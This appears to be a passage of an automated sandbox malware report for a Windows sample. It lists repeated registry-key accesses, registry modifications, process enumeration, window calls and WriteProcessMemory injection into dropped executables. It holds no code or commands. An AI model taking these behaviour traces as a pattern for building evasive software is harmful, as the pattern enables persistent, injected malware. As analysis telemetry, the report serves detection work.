Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\ogogoYAQ\pSoMwskA.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2196 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Users\Admin\mkcUkYkA\KGAQwQEs.exe
PID 2196 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Users\Admin\mkcUkYkA\KGAQwQEs.exe
PID 2196 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Users\Admin\mkcUkYkA\KGAQwQEs.exe
PID 2196 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Users\Admin\mkcUkYkA\KGAQwQEs.exe
PID 2196 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\ProgramData\YKcAIoYs\DGQIEEQU.exe
PID 2196 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\ProgramData\YKcAIoYs\DGQIEEQU.exe
PID 2196 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\ProgramData\YKcAIoYs\DGQIEEQU.exe
PID 2196 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\ProgramData\YKcAIoYs\DGQIEEQU.exe
